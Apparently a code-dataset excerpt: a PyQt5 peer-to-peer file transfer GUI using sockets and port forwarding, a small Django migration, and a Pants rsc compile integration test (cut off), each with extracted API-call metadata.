#fs=Filesplit()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(425, 455)
MainWindow.setAcceptDrops(True)
MainWindow.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(310, 129, 91, 73))
self.pushButton.setObjectName("pushButton")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(30, 130, 281, 71))
self.textEdit.setObjectName("textEdit")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(32, 26, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(32, 113, 220, 13))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(32, 6, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(32, 212, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(32, 236, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_8.setFont(font)
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(32, 284, 381, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_9.setFont(font)
self.label_9.setObjectName("label_9")
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(32, 269, 381, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(32, 248, 480, 31))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_11.setFont(font)
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(32, 327, 47, 13))
self.label_12.setObjectName("label_12")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(87, 324, 113, 20))
self.lineEdit.setObjectName("lineEdit")
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(87, 352, 113, 20))
self.lineEdit_2.setObjectName("lineEdit_2")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(32, 354, 47, 13))
self.label_13.setObjectName("label_13")
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(87, 380, 113, 20))
self.lineEdit_3.setObjectName("lineEdit_3")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(32, 380, 51, 16))
self.label_14.setObjectName("label_14")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(230, 322, 101, 81))
self.pushButton_2.setObjectName("pushButton_2")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(32, 32, 371, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(32, 62, 291, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(79, 91, 113, 20))
self.lineEdit_4.setObjectName("lineEdit_4")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(32, 48, 371, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.label_15 = QtWidgets.QLabel(self.centralwidget)
self.label_15.setGeometry(QtCore.QRect(32, 300, 390, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_15.setFont(font)
self.label_15.setObjectName("label_15")
self.label_16 = QtWidgets.QLabel(self.centralwidget)
self.label_16.setGeometry(QtCore.QRect(32, 93, 47, 13))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_16.setFont(font)
self.label_16.setObjectName("label_16")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(290, 100, 111, 23))
self.pushButton_3.setObjectName("pushButton_3")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "P2PFileTransfer"))
self.pushButton.setText(_translate("MainWindow", "Send"))
self.pushButton.clicked.connect(self.sendFile)
self.label_4.setText(_translate("MainWindow", "Instructions:"))
self.label_5.setText(_translate("MainWindow", "Drop the file here:"))
self.label_6.setText(_translate("MainWindow", "Send:"))
self.label_7.setText(_translate("MainWindow", "Receive:"))
self.label_8.setText(_translate("MainWindow", "Instructions:"))
self.label_9.setText(_translate("MainWindow", "you just give it a name and extension and you are done!"))
self.label_10.setText(_translate("MainWindow", "sending peer(there are lots of tutorials on internet) then"))
self.label_11.setText(_translate("MainWindow", "For receiving a file you have to paste the public ip of the"))
self.label_12.setText(_translate("MainWindow", "IP:"))
self.label_13.setText(_translate("MainWindow", "Filename:"))
self.label_14.setText(_translate("MainWindow", "extension:"))
self.pushButton_2.setText(_translate("MainWindow", "Receive"))
self.pushButton_2.clicked.connect(self.receiveFile)
self.label.setText(_translate("MainWindow", "Specify the buffer(leave blank for default)(client has to have the same) "))
self.label_2.setText(_translate("MainWindow", "Drop the file and hit send"))
self.label_3.setText(_translate("MainWindow", "have the same buffer)(max suggested buffer 256000) "))
self.label_15.setText(_translate("MainWindow", "remember to specify the same buffer as the server above"))
self.label_16.setText(_translate("MainWindow", "Buffer:"))
self.pushButton_3.setText(_translate("MainWindow", "Localhost"))
self.pushButton_3.clicked.connect(self.localHostClick)
self.localHost=False
def localHostClick(self):
if self.localHost==False:
self.localHost=True
else:
self.localHost=False
self.textEdit.setText("localHost set to: "+str(self.localHost))
def receiveFile(self):
startRecv=time.perf_counter()
bufferStr=self.lineEdit_4.text()
if bufferStr=="":
buffer=32000
else:
buffer=int(bufferStr)
s = socket.socket() # Create a socket object
host = self.lineEdit.text() #Ip address that the TCPServer is there
port = 25575 # Reserve a port for your service every new transfer wants a new port or you must wait.
s.connect((host, port))
welcomemsg="Hello server!"
s.send(bytearray(welcomemsg,"utf-8"))
with open('received_file', 'wb') as f:
print('file opened')
#self.textEdit.append('receiving data...')
while True:
data = s.recv(buffer)
#print('data=%s', (data))
if not data:
break
# write data to a file
f.write(data)
f.close()
endRecv=time.perf_counter()
finalTimeRecv=endRecv-startRecv
self.textEdit.append('Successfully got the file in '+str(round(finalTimeRecv,3))+"s")
s.close()
print('connection closed')
filename=self.lineEdit_2.text()
ext=self.lineEdit_3.text()
os.rename("received_file",filename+ext)
def sendFile(self):
if self.localHost==False:
openPort = port_forward_3.EnablePort(25575)
#openPort = portforwardlib.forwardPort(25575,25575,"","",False,"TCP","","P2Pfiletranfer","")
else:
xd=1
filepath= self.textEdit.toPlainText()
filepath=filepath.replace("file:///","")
bufferStr=self.lineEdit_4.text()
if bufferStr=="":
buffer=32000
else:
buffer=int(bufferStr)
port = 25575 # Reserve a port for your service every new transfer wants a new port or you must wait.
s = socket.socket() # Create a socket object
host = "" # Get local machine name
s.bind((host, port)) # Bind to the port
s.listen(5) # Now wait for client connection.
self.textEdit.append('Server listening....')
i=0
while i==0:
conn, addr = s.accept() # Establish connection with client.
self.textEdit.append('Got connection from' + str(addr))
startSend=time.perf_counter()
data = conn.recv(buffer)
#self.textEdit.setText('Server received' + str(repr(data)))
filename=filepath #In the same folder or path is this file running must the file you want to tranfser to be
f = open(filename,'rb')
l = f.read(buffer)
#self.textEdit.append('Sending file ')
while (l):
conn.send(l)
l = f.read(buffer)
f.close()
endSend=time.perf_counter()
finalTimeSend=endSend-startSend
self.textEdit.append('Done sending in '+str(round(finalTimeSend,3))+"s")
conn.close()
if self.localHost==False:
closePort=port_forward_3.DisablePort(25575)
else:
xd=1
i=1
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QTextEdit",
"port_forward_3.DisablePort",
"PyQt5.QtWidgets.QMainWindow",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtGui.QFont",
"socket.socket",
"port_forward_3.EnablePort",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"os.rename",
"time.perf_counter",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QPushButton"
] | [((12811, 12843), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (12833, 12843), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((12861, 12884), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (12882, 12884), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((714, 743), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (731, 743), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((828, 869), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (849, 869), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1014, 1053), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1033, 1053), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1191, 1227), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1207, 1227), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1307, 1320), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1318, 1320), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1505, 1541), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1521, 1541), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1676, 1712), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1692, 1712), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1791, 1804), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1802, 1804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1989, 2025), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2005, 2025), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2106, 2119), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2117, 2119), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2304, 2340), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2320, 2340), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2421, 2434), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2432, 2434), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2619, 2655), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2635, 2655), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2736, 2749), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2747, 2749), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2935, 2971), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2951, 2971), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3053, 3066), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3064, 3066), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3255, 3291), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3271, 3291), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3373, 3386), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3384, 3386), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3575, 3611), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3591, 3611), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3749, 3788), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3768, 3788), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3929, 3968), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3948, 3968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4113, 4149), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4129, 4149), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4289, 4328), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4308, 4328), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4473, 4509), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4489, 4509), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4651, 4692), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4672, 4692), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4841, 4877), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4857, 4877), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4955, 4968), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4966, 4968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5177, 5213), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5193, 5213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5293, 5306), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5304, 5306), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5524, 5563), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5543, 5563), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5706, 5742), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5722, 5742), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5822, 5835), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5833, 5835), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6051, 6087), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6067, 6087), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6169, 6182), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6180, 6182), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6371, 6407), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6387, 6407), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6487, 6500), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6498, 6500), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6693, 6734), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6714, 6734), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6943, 6975), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainWindow'], {}), '(MainWindow)\n', (6963, 6975), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((7122, 7171), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (7159, 7171), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((9466, 9485), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9483, 9485), False, 'import time\n'), ((9638, 9653), 'socket.socket', 'socket.socket', ([], {}), '()\n', (9651, 9653), False, 'import socket\n'), ((10427, 10446), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (10444, 10446), False, 'import time\n'), ((10717, 10759), 'os.rename', 'os.rename', (['"""received_file"""', '(filename + ext)'], {}), "('received_file', filename + ext)\n", (10726, 10759), False, 'import os\n'), ((11381, 11396), 'socket.socket', 'socket.socket', ([], {}), '()\n', (11394, 11396), False, 'import socket\n'), ((906, 936), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(310)', '(129)', '(91)', '(73)'], {}), '(310, 129, 91, 73)\n', (918, 936), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1088, 1118), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(130)', '(281)', '(71)'], {}), '(30, 130, 281, 71)\n', (1100, 1118), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1261, 1290), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(26)', '(131)', '(16)'], {}), '(32, 26, 131, 16)\n', (1273, 1290), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1575, 1605), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(113)', '(220)', '(13)'], {}), '(32, 113, 220, 13)\n', (1587, 1605), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1746, 1774), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(6)', '(131)', '(16)'], {}), '(32, 6, 131, 16)\n', (1758, 1774), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2059, 2089), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(212)', '(131)', '(16)'], {}), '(32, 212, 131, 16)\n', (2071, 2089), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2374, 2404), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(236)', '(131)', '(16)'], {}), '(32, 236, 131, 16)\n', (2386, 2404), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2689, 2719), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(284)', '(381)', '(20)'], {}), '(32, 284, 381, 20)\n', (2701, 2719), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3006, 3036), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(269)', '(381)', '(20)'], {}), '(32, 269, 381, 20)\n', (3018, 3036), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3326, 3356), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(248)', '(480)', '(31)'], {}), '(32, 248, 480, 31)\n', (3338, 3356), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3646, 3675), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(327)', '(47)', '(13)'], {}), '(32, 327, 47, 13)\n', (3658, 3675), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3823, 3853), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(324)', '(113)', '(20)'], {}), '(87, 324, 113, 20)\n', (3835, 3853), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4005, 4035), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(352)', '(113)', '(20)'], {}), '(87, 352, 113, 20)\n', (4017, 4035), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4184, 4213), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(354)', '(47)', '(13)'], {}), '(32, 354, 47, 13)\n', (4196, 4213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4365, 4395), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(380)', '(113)', '(20)'], {}), '(87, 380, 113, 20)\n', (4377, 4395), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4544, 4573), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(380)', '(51)', '(16)'], {}), '(32, 380, 51, 16)\n', (4556, 4573), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4731, 4762), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(230)', '(322)', '(101)', '(81)'], {}), '(230, 322, 101, 81)\n', (4743, 4762), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4909, 4938), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(32)', '(371)', '(41)'], {}), '(32, 32, 371, 41)\n', (4921, 4938), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5247, 5276), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(62)', '(291)', '(41)'], {}), '(32, 62, 291, 41)\n', (5259, 5276), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5600, 5629), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(79)', '(91)', '(113)', '(20)'], {}), '(79, 91, 113, 20)\n', (5612, 5629), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5776, 5805), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(48)', '(371)', '(41)'], {}), '(32, 48, 371, 41)\n', (5788, 5805), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6122, 6152), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(300)', '(390)', '(20)'], {}), '(32, 300, 390, 20)\n', (6134, 6152), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6442, 6470), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(93)', '(47)', '(13)'], {}), '(32, 93, 47, 13)\n', (6454, 6470), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6773, 6804), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(290)', '(100)', '(111)', '(23)'], {}), '(290, 100, 111, 23)\n', (6785, 6804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((10840, 10872), 'port_forward_3.EnablePort', 'port_forward_3.EnablePort', (['(25575)'], {}), '(25575)\n', (10865, 10872), False, 'import port_forward_3\n'), ((11882, 11901), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (11899, 11901), False, 'import time\n'), ((12397, 12416), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (12414, 12416), False, 'import time\n'), ((12649, 12682), 'port_forward_3.DisablePort', 'port_forward_3.DisablePort', (['(25575)'], {}), '(25575)\n', (12675, 12682), False, 'import port_forward_3\n')] |
# Generated by Django 2.2.5 on 2020-01-05 14:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0018_user_stripe_customer_id'),
]
operations = [
migrations.AlterModelOptions(
name='guest',
options={'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'},
),
]
| [
"django.db.migrations.AlterModelOptions"
] | [((230, 339), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""guest"""', 'options': "{'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'}"}), "(name='guest', options={'verbose_name': 'ゲスト',\n 'verbose_name_plural': 'ゲスト'})\n", (258, 339), False, 'from django.db import migrations\n')] |
# coding=utf-8
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.util.contextutil import temporary_dir
from pants_test.backend.jvm.tasks.jvm_compile.base_compile_integration_test import BaseCompileIT
class RscCompileIntegration(BaseCompileIT):
def test_basic_binary(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'}
}
pants_run = self.run_pants(
['compile',
'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin',
],
config)
self.assert_success(pants_run)
def test_basic_binary_hermetic(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'},
'compile.rsc': {
'execution_strategy': 'hermetic',
'incremental': False,
}
}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['compile',
'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin',
],
workdir, config)
self.assert_success(pants_run)
path = os.path.join(
workdir,
'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc',
'classes/org/pantsbuild/testproject/mutual/A.class')
self.assertTrue(os.path.exists(path))
path = os.path.join(
workdir,
'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc',
'outline/META-INF/semanticdb/out.semanticdb')
self.assertTrue(os.path.exists(path))
path = os.path.join(
workdir,
'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar')
self.assertTrue(os.path.exists(path))
def test_executing_multi_target_binary(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'},
'compile.rsc': {'execution_strategy': 'subprocess'}
}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['run',
'examples/src/scala/org/pantsbuild/example/hello/exe',
],
workdir, config)
self.assert_success(pants_run)
self.assertIn('Hello, Resource World!', pants_run.stdout_data)
| [
"os.path.exists",
"pants.util.contextutil.temporary_dir",
"os.path.join"
] | [((474, 489), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (487, 489), False, 'from pants.util.contextutil import temporary_dir\n'), ((872, 887), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (885, 887), False, 'from pants.util.contextutil import temporary_dir\n'), ((2197, 2212), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (2210, 2212), False, 'from pants.util.contextutil import temporary_dir\n'), ((1429, 1612), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc"""', '"""classes/org/pantsbuild/testproject/mutual/A.class"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc'\n , 'classes/org/pantsbuild/testproject/mutual/A.class')\n", (1441, 1612), False, 'import os\n'), ((1696, 1871), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc"""', '"""outline/META-INF/semanticdb/out.semanticdb"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc'\n , 'outline/META-INF/semanticdb/out.semanticdb')\n", (1708, 